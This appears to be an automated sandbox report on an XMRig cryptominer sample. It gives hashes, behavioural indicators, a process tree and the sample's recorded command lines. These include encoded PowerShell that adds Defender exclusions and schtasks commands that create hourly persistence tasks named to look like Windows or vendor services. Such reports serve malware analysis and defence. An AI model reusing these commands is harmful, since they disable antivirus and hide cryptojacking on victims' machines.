xmrig | 69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef

Analysis

max time kernel
166s
max time network
169s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
24-09-2022 22:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
Size

722.4MB
MD5

a2d302bbecc9b38529cc016adc334b17
SHA1

323c64e329187281a418195191f5802a79bc70d9
SHA256

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef
SHA512

9c299c215b2769ba3729426aab92e198fb966bd411ff550b0771c02404e550451ba8c36575969f5908c3a8dc40d3de670eabe4ba2bf5b06235eb1117b24c2b37
SSDEEP

49152:q+G3R8rSAZkqqKR8GEOWT+RvTKVrcxO5VJhOYJH3/UTM:q+G3+rSikq7R8GEfEagxgbOCOM

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Dllhost\winlogson.exe	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

Processes:

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

Executes dropped EXE 2 IoCs

Processes:

dllhost.exewinlogson.exe

pid process

3656 dllhost.exe
3304 winlogson.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
3656	dllhost.exe
3304	winlogson.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

pid	process
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
504	schtasks.exe
3760	schtasks.exe
1008	schtasks.exe
3516	schtasks.exe
4648	schtasks.exe
356	schtasks.exe
2252	schtasks.exe
4504	schtasks.exe
420	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllhost.exe

pid	process
2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1256	powershell.exe
1456	powershell.exe
2204	powershell.exe
3312	powershell.exe
216	powershell.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
216	powershell.exe
1256	powershell.exe
1456	powershell.exe
2204	powershell.exe
3656	dllhost.exe
3312	powershell.exe
3656	dllhost.exe
216	powershell.exe
3656	dllhost.exe
3656	dllhost.exe
1456	powershell.exe
3656	dllhost.exe
2204	powershell.exe
3656	dllhost.exe
1256	powershell.exe
3656	dllhost.exe
3312	powershell.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe
3656	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620

pid	process
620

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exepowershell.exedllhost.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exewinlogson.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	3656	dllhost.exe
Token: SeShutdownPrivilege	2456	powercfg.exe
Token: SeCreatePagefilePrivilege	2456	powercfg.exe
Token: SeShutdownPrivilege	308	powercfg.exe
Token: SeCreatePagefilePrivilege	308	powercfg.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeShutdownPrivilege	4508	powercfg.exe
Token: SeCreatePagefilePrivilege	4508	powercfg.exe
Token: SeShutdownPrivilege	3304	winlogson.exe
Token: SeCreatePagefilePrivilege	3304	winlogson.exe
Token: SeShutdownPrivilege	3416	powercfg.exe
Token: SeCreatePagefilePrivilege	3416	powercfg.exe
Token: SeShutdownPrivilege	3416	powercfg.exe
Token: SeCreatePagefilePrivilege	3416	powercfg.exe
Token: SeLockMemoryPrivilege	3304	winlogson.exe
Token: SeLockMemoryPrivilege	3304	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winlogson.exe

pid process

3304 winlogson.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

pid process

2752 69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

pid	process
3304	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2752 wrote to memory of 1964	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 1964	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 1964	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 1964 wrote to memory of 1144	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 1144	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 1144	1964	cmd.exe	powershell.exe
PID 2752 wrote to memory of 3656	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	dllhost.exe
PID 2752 wrote to memory of 3656	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	dllhost.exe
PID 2752 wrote to memory of 3656	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	dllhost.exe
PID 2752 wrote to memory of 4724	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4724	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4724	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4736	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4736	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4736	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4524	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4524	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4524	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4060	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4060	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4060	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 2140	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 2140	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 2140	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4792	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4792	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4792	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4848	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4848	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4848	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 2208	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 2208	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 2208	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3724	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3724	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3724	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4852	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4852	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4852	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3872	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3872	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3872	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3888	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3888	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3888	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4056	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4056	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 4056	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3928	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3928	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 2752 wrote to memory of 3928	2752	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	cmd.exe
PID 4736 wrote to memory of 4504	4736	cmd.exe	schtasks.exe
PID 4736 wrote to memory of 4504	4736	cmd.exe	schtasks.exe
PID 4736 wrote to memory of 4504	4736	cmd.exe	schtasks.exe
PID 4724 wrote to memory of 4648	4724	cmd.exe	schtasks.exe
PID 4724 wrote to memory of 4648	4724	cmd.exe	schtasks.exe
PID 4724 wrote to memory of 4648	4724	cmd.exe	schtasks.exe
PID 4524 wrote to memory of 420	4524	cmd.exe	schtasks.exe
PID 4524 wrote to memory of 420	4524	cmd.exe	schtasks.exe
PID 4524 wrote to memory of 420	4524	cmd.exe	schtasks.exe
PID 4060 wrote to memory of 356	4060	cmd.exe	schtasks.exe
PID 4060 wrote to memory of 356	4060	cmd.exe	schtasks.exe
PID 4060 wrote to memory of 356	4060	cmd.exe	schtasks.exe
PID 3724 wrote to memory of 1256	3724	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
"C:\Users\Admin\AppData\Local\Temp\69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAGkAMABhAFMAUwBOAG0AaQBnAHUASgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAcwBMAEcAWgBOACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADAAdgBKAEYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANAA0AGcAMQBlAHYASwAjAD4A"
2⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGkAMABhAFMAUwBOAG0AaQBnAHUASgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAcwBMAEcAWgBOACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADAAdgBKAEYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANAA0AGcAMQBlAHYASwAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
3⤵
PID:2920

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:2184

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3304

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo бДoыФcn5N6pЙfуD & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ОjЕKфcJкPрЗЫ
2⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:4648

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo SxтрфIByGЫТV & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo byДBXХUИ
2⤵
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:420

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo Ъ6RcгIWupRneVд & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo XрГ9пPОъщgКtе6luа
2⤵
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:356

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo лSFJзьЧШlбрI0 & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo гdХЦeПQVЧРЕТ
2⤵
PID:2140

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:1008

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo oВмdw9SбMрnhiгЩ & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo uСJо
2⤵
PID:4792

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:504

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo м4ЕhЛDX & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo сТPеrЕЧцQоцThс
2⤵
PID:2208

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:2252

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFAASQAkBDIEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAdBFkASgA6BCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBtADgANQQdBGYALAQTBFoAIwA+ACAAQAAoACAAPAAjAB0EdQAkBE0ALARhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAWBHoAUAB5ACEEOQBNBCsEbwAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASgBDBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAQQAjAD4A"
2⤵
PID:4852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFAASQAkBDIEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAdBFkASgA6BCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBtADgANQQdBGYALAQTBFoAIwA+ACAAQAAoACAAPAAjAB0EdQAkBE0ALARhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAWBHoAUAB5ACEEOQBNBCsEbwAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASgBDBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAQQAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjACYEYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABsESAAyBDYAbgBCBBAEKwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAOQRGBEUERABWAG4AFgQ+BCMAPgAgAEAAKAAgADwAIwBZACkEcQBABCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBhAEcATwBPAEoEUABhACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBkAGcAMwBRAHAAbwBDACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADIENARLAE8AMwAuBCYEWQBwAEcAcgBoABsEUwAjAD4A"
2⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjACYEYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABsESAAyBDYAbgBCBBAEKwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAOQRGBEUERABWAG4AFgQ+BCMAPgAgAEAAKAAgADwAIwBZACkEcQBABCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBhAEcATwBPAEoEUABhACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBkAGcAMwBRAHAAbwBDACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADIENARLAE8AMwAuBCYEWQBwAEcAcgBoABsEUwAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAEQANwRLAB0EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAEUEeAAwAEAEJAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAIQQUBBkEYgAzABMEdgBuACQEcwBCBCMAPgAgAEAAKAAgADwAIwA3AHQAHgQzAHUAWAAgBG0ASgAYBCMEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFoAcAAvBEQAbgBiACcEFQQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAbAA4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEsEOAQdBEcARgBFBFAAIwA+AA=="
2⤵
PID:4056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAEQANwRLAB0EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAEUEeAAwAEAEJAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAIQQUBBkEYgAzABMEdgBuACQEcwBCBCMAPgAgAEAAKAAgADwAIwA3AHQAHgQzAHUAWAAgBG0ASgAYBCMEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFoAcAAvBEQAbgBiACcEFQQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAbAA4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEsEOAQdBEcARgBFBFAAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjACwERgBZADoEQgBwADIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBqABsEOABBADEEQQQSBGQAHwRJACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBpAGUANwRVAD4EbAAUBCMAPgAgAEAAKAAgADwAIwA4BFMAYwA4ABMEZQA5BHEANwREAEoEegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAIAQwBCcEOgQYBHIALgRiAEEEFgRDAE0ARwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAUwBaACAEIwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBOAFMATARDAGcAMQBHBCMAPgA="
2⤵
PID:3888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjACwERgBZADoEQgBwADIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBqABsEOABBADEEQQQSBGQAHwRJACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBpAGUANwRVAD4EbAAUBCMAPgAgAEAAKAAgADwAIwA4BFMAYwA4ABMEZQA5BHEANwREAEoEegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAIAQwBCcEOgQYBHIALgRiAEEEFgRDAE0ARwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAUwBaACAEIwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBOAFMATARDAGcAMQBHBCMAPgA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjACMEEgRSADoERAAwBGoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBRADsEMgRJBGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjABgEEgRLBDwEHwR5ABwEUAAjAD4AIABAACgAIAA8ACMAMAQoBE8ETQQsBEEESgBXAEMAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAB0EagAzAD4EOABIAEwAcABnACsEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAB8EbgApBD4EbQAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAE8AeQBiADAAMwBTADEEOARJBCEEbQBFBGgARwAjAD4A"
2⤵
PID:3872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
